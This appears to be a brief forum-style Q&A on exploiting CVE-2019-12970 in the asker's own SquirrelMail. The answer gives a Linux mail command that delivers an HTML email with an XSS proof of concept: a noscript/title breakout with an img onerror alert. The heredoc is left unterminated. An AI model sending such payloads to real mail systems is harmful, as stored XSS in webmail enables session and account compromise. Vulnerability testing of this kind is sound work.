How can I exploit my SquirrelMail against this CVE-2019-12970?
To exploit this you need to use the Linux mail command. Like this

mail -a "Content-type: text/html" -s "My little pony" \
        [email protected] <<EOD
<p title="</noscript><img src=x onerror=alert(2)>"></p>

